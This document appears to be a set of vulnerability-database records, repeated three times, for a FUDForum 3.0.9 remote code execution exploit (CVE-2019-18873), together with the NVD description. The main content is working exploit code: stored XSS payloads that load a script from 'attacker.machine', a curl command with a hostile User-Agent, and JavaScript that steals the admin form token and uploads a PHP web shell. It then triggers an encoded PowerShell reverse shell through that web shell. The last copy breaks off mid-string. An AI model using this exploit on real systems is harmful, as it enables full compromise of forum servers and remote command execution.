{"id": "1337DAY-ID-33523", "bulletinFamily": "exploit", "title": "FUDForum 3.0.9 - Remote Code Execution Exploit", "description": "Exploit for php platform in category web applications", "published": "2019-11-13T00:00:00", "modified": "2019-11-13T00:00:00", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "href": "https://0day.today/exploit/description/33523", "reporter": "liquidsky", "references": [], "cvelist": ["CVE-2019-18873"], "type": "zdt", "lastseen": "2019-12-04T19:58:55", "edition": 1, "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-18873"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:415E49FD56AE97FF0EDBFA10ECE120C7"]}, {"type": "exploitdb", "idList": ["EDB-ID:47650"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155261"]}], "modified": "2019-12-04T19:58:55", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2019-12-04T19:58:55", "rev": 2}, "vulnersScore": 7.0}, "sourceHref": "https://0day.today/exploit/33523", "sourceData": "# Exploit Title : FUDForum 3.0.9 - Remote Code Execution\r\n# Date: 2019-10-26\r\n# Exploit Author: liquidsky (JMcPeters)\r\n# Vulnerable Software: FUDForum 3.0.9\r\n# Vendor Homepage: https://sourceforge.net/projects/fudforum/\r\n# Version: 3.0.9\r\n# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download\r\n# Tested On: Windows / mysql / apache\r\n# Author Site: https://github.com/fuzzlove/FUDforum-XSS-RCE\r\n# Demo: https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks\r\n# CVE: CVE-2019-18873\r\n\r\n\r\n// Greetz : wetw0rk, Fr13ndz, offsec =)\r\n//\r\n// Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution.\r\n// The areas impacted are the admin panel and the forum.\r\n//\r\n// XSS via username in Forum:\r\n// 1. Register an account and log in to the forum.\r\n// 2. Go to the user control panel. -> Account Settings -> change login\r\n// 3. Insert javascript payload <script/src=\"http://attacker.machine/fud.js\"></script>\r\n// 4. When the admin visits the user information the payload will fire, uploading a php shell on the remote system.\r\n//\r\n// XSS via user-agent in Admin Panel:\r\n// 1. Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity.\r\n// 2. Send the XSS payload below (from an IP associated with an account) / host the script:\r\n// 3. curl -A '<script src=\"http://attacker.machine/fud.js\"></script>' http://target.machine/fudforum/index.php\r\n// 4. When the admin visits the user information from the admin controls / User Manager the payload will fire under \"Recent sessions\", uploading a php shell on the remote system.\r\n//\r\n\r\nfunction patience()\r\n{\r\n\tvar u=setTimeout(\"grabShell()\",5000);\r\n}\r\n\r\n// This function is to call the reverse shell php script (liquidsky.php).\r\n// currently using a powershell payload that will need to be modified.\r\nfunction grabShell()\r\n{\r\n\tvar url =\"/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75%41%47%63%41%64%41%42%6f%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a%51%42%34%41%48%51%41%4c%67%42%42%41%46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%31%41%48%4d%41%61%41%41%6f%41%43%6b%41%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41\";\r\n \txhr = new XMLHttpRequest();\r\n\txhr.open(\"GET\", url, true);\r\n\txhr.send(null);\r\n\r\n}\r\n\r\nfunction submitFormWithTokenJS(token) {\r\n var xhr = new XMLHttpRequest();\r\n xhr.open(\"POST\", '/fudforum/adm/admbrowse.php', true);\r\n\r\n // Send the proper header information along with the request\r\n xhr.setRequestHeader(\"Content-Type\", \"multipart/form-data, boundary=-----------------------------9703186584101745941654835853\");\r\n\r\n var currentdir = \"C:/xampp/htdocs/fudforum\"; // webroot - forum directory\r\n var fileName = \"liquidsky.php\";\r\n var url = \"/fudforum/adm/admbrowse.php\";\r\n var ctype = \"application/x-php\";\r\n var fileData = \"<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; }?>\";\r\n var boundary = \"-----------------------------9703186584101745941654835853\";\r\n var fileSize = fileData.length;\r\n\r\n var body = \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: form-data; name=\"cur\"\\r\\n\\r\\n';\r\n body += currentdir + \"\\r\\n\";\r\n body += \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: form-data; name=\"SQ\"\\r\\n\\r\\n';\r\n body += token + \"\\r\\n\";\r\n body += \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: form-data; name=\"fname\"; filename=\"' + fileName + '\"\\r\\n';\r\n body += \"Content-Type: \" + ctype + \"\\r\\n\\r\\n\";\r\n body += fileData + \"\\r\\n\\r\\n\";\r\n body += \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: form-data; name=\"tmp_f_val\"\\r\\n\\r\\n';\r\n body += \"1\" + \"\\r\\n\";\r\n body += \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: form-data; name=\"d_name\"\\r\\n\\r\\n';\r\n body += fileName + \"\\r\\n\";\r\n body += \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: form-data; name=\"file_upload\"\\r\\n\\r\\n';\r\n body += \"Upload File\" + '\\r\\n';\r\n body += \"--\" + boundary + \"--\";\r\n\r\n xhr.send(body);\r\n}\r\n\r\n//Grab SQ token\r\nvar req = new XMLHttpRequest();\r\n\r\nreq.onreadystatechange=function()\r\n{\r\n if (req.readyState == 4 && req.status == 200) {\r\n var htmlPage = req.responseXML; /* fetch html */\r\n var SQ = htmlPage.getElementsByTagName(\"input\")[0]\r\n submitFormWithTokenJS(SQ.value);\r\n }\r\n}\r\n\r\nreq.open(\"GET\", \"/fudforum/adm/admuser.php\", true);\r\nreq.responseType = \"document\";\r\nreq.send();\r\n\r\npatience();\r\n\n\n# 0day.today [2019-12-04] #", "immutableFields": []}

{"cve": [{"lastseen": "2021-02-02T07:12:56", "description": "FUDForum 3.0.9 is vulnerable to Stored XSS via the User-Agent HTTP header. This may result in remote code execution. An attacker can use a user account to fully compromise the system via a GET request. When the admin visits user information under \"User Manager\" in the control panel, the payload will execute. This will allow for PHP files to be written to the web root, and for code to execute on the remote server. The problem is in admsession.php and admuser.php.", "edition": 5, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-11-12T02:15:00", "title": "CVE-2019-18873", "type": "cve", "cwe": ["CWE-79", "CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18873"], "modified": "2019-11-15T19:05:00", "cpe": ["cpe:/a:fudforum:fudforum:3.0.9"], "id": "CVE-2019-18873", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-18873", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:fudforum:fudforum:3.0.9:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2019-11-13T18:28:17", "description": "", "published": "2019-11-13T00:00:00", "type": "exploitdb", "title": "FUDForum 3.0.9 - Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-18873"], "modified": "2019-11-13T00:00:00", "id": "EDB-ID:47650", "href": "https://www.exploit-db.com/exploits/47650", "sourceData": "# Exploit Title : FUDForum 3.0.9 - Remote Code Execution\r\n# Date: 2019-10-26\r\n# Exploit Author: liquidsky (JMcPeters)\r\n# Vulnerable Software: FUDForum 3.0.9\r\n# Vendor Homepage: https://sourceforge.net/projects/fudforum/\r\n# Version: 3.0.9\r\n# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download\r\n# Tested On: Windows / mysql / apache\r\n# Author Site: https://github.com/fuzzlove/FUDforum-XSS-RCE\r\n# Demo: https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks\r\n# CVE: CVE-2019-18873\r\n\r\n\r\n// Greetz : wetw0rk, Fr13ndz, offsec =)\r\n//\r\n// Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution.\r\n// The areas impacted are the admin panel and the forum.\r\n//\r\n// XSS via username in Forum:\r\n// 1. Register an account and log in to the forum.\r\n// 2. Go to the user control panel. -> Account Settings -> change login\r\n// 3. Insert javascript payload <script/src=\"http://attacker.machine/fud.js\"></script>\r\n// 4. When the admin visits the user information the payload will fire, uploading a php shell on the remote system.\r\n//\r\n// XSS via user-agent in Admin Panel:\r\n// 1. Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity.\r\n// 2. Send the XSS payload below (from an IP associated with an account) / host the script:\r\n// 3. curl -A '<script src=\"http://attacker.machine/fud.js\"></script>' http://target.machine/fudforum/index.php\r\n// 4. When the admin visits the user information from the admin controls / User Manager the payload will fire under \"Recent sessions\", uploading a php shell on the remote system.\r\n//\r\n\r\nfunction patience()\r\n{\r\n\tvar u=setTimeout(\"grabShell()\",5000);\r\n}\r\n\r\n// This function is to call the reverse shell php script (liquidsky.php).\r\n// currently using a powershell payload that will need to be modified.\r\nfunction grabShell()\r\n{\r\n\tvar url =\"/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75%41%47%63%41%64%41%42%6f%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a%51%42%34%41%48%51%41%4c%67%42%42%41%46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%31%41%48%4d%41%61%41%41%6f%41%43%6b%41%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41\";\r\n \txhr = new XMLHttpRequest();\r\n\txhr.open(\"GET\", url, true);\r\n\txhr.send(null);\r\n\r\n}\r\n\r\nfunction submitFormWithTokenJS(token) {\r\n var xhr = new XMLHttpRequest();\r\n xhr.open(\"POST\", '/fudforum/adm/admbrowse.php', true);\r\n\r\n // Send the proper header information along with the request\r\n xhr.setRequestHeader(\"Content-Type\", \"multipart/form-data, boundary=-----------------------------9703186584101745941654835853\");\r\n\r\n var currentdir = \"C:/xampp/htdocs/fudforum\"; // webroot - forum directory\r\n var fileName = \"liquidsky.php\";\r\n var url = \"/fudforum/adm/admbrowse.php\";\r\n var ctype = \"application/x-php\";\r\n var fileData = \"<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; }?>\";\r\n var boundary = \"-----------------------------9703186584101745941654835853\";\r\n var fileSize = fileData.length;\r\n\r\n var body = \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: form-data; name=\"cur\"\\r\\n\\r\\n';\r\n body += currentdir + \"\\r\\n\";\r\n body += \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: form-data; name=\"SQ\"\\r\\n\\r\\n';\r\n body += token + \"\\r\\n\";\r\n body += \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: form-data; name=\"fname\"; filename=\"' + fileName + '\"\\r\\n';\r\n body += \"Content-Type: \" + ctype + \"\\r\\n\\r\\n\";\r\n body += fileData + \"\\r\\n\\r\\n\";\r\n body += \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: form-data; name=\"tmp_f_val\"\\r\\n\\r\\n';\r\n body += \"1\" + \"\\r\\n\";\r\n body += \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: form-data; name=\"d_name\"\\r\\n\\r\\n';\r\n body += fileName + \"\\r\\n\";\r\n body += \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: form-data; name=\"file_upload\"\\r\\n\\r\\n';\r\n body += \"Upload File\" + '\\r\\n';\r\n body += \"--\" + boundary + \"--\";\r\n\r\n xhr.send(body);\r\n}\r\n\r\n//Grab SQ token\r\nvar req = new XMLHttpRequest();\r\n\r\nreq.onreadystatechange=function()\r\n{\r\n if (req.readyState == 4 && req.status == 200) {\r\n var htmlPage = req.responseXML; /* fetch html */\r\n var SQ = htmlPage.getElementsByTagName(\"input\")[0]\r\n submitFormWithTokenJS(SQ.value);\r\n }\r\n}\r\n\r\nreq.open(\"GET\", \"/fudforum/adm/admuser.php\", true);\r\nreq.responseType = \"document\";\r\nreq.send();\r\n\r\npatience();", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/47650"}], "exploitpack": [{"lastseen": "2020-04-01T20:39:57", "description": "\nFUDForum 3.0.9 - Remote Code Execution", "edition": 1, "published": "2019-11-13T00:00:00", "title": "FUDForum 3.0.9 - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-18873"], "modified": "2019-11-13T00:00:00", "id": "EXPLOITPACK:415E49FD56AE97FF0EDBFA10ECE120C7", "href": "", "sourceData": "# Exploit Title : FUDForum 3.0.9 - Remote Code Execution\n# Date: 2019-10-26\n# Exploit Author: liquidsky (JMcPeters)\n# Vulnerable Software: FUDForum 3.0.9\n# Vendor Homepage: https://sourceforge.net/projects/fudforum/\n# Version: 3.0.9\n# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download\n# Tested On: Windows / mysql / apache\n# Author Site: https://github.com/fuzzlove/FUDforum-XSS-RCE\n# Demo: https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks\n# CVE: CVE-2019-18873\n\n\n// Greetz : wetw0rk, Fr13ndz, offsec =)\n//\n// Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution.\n// The areas impacted are the admin panel and the forum.\n//\n// XSS via username in Forum:\n// 1. Register an account and log in to the forum.\n// 2. Go to the user control panel. -> Account Settings -> change login\n// 3. Insert javascript payload <script/src=\"http://attacker.machine/fud.js\"></script>\n// 4. When the admin visits the user information the payload will fire, uploading a php shell on the remote system.\n//\n// XSS via user-agent in Admin Panel:\n// 1. Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity.\n// 2. Send the XSS payload below (from an IP associated with an account) / host the script:\n// 3. curl -A '<script src=\"http://attacker.machine/fud.js\"></script>' http://target.machine/fudforum/index.php\n// 4. When the admin visits the user information from the admin controls / User Manager the payload will fire under \"Recent sessions\", uploading a php shell on the remote system.\n//\n\nfunction patience()\n{\n\tvar u=setTimeout(\"grabShell()\",5000);\n}\n\n// This function is to call the reverse shell php script (liquidsky.php).\n// currently using a powershell payload that will need to be modified.\nfunction grabShell()\n{\n\tvar url =\"/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75%41%47%63%41%64%41%42%6f%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a%51%42%34%41%48%51%41%4c%67%42%42%41%46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61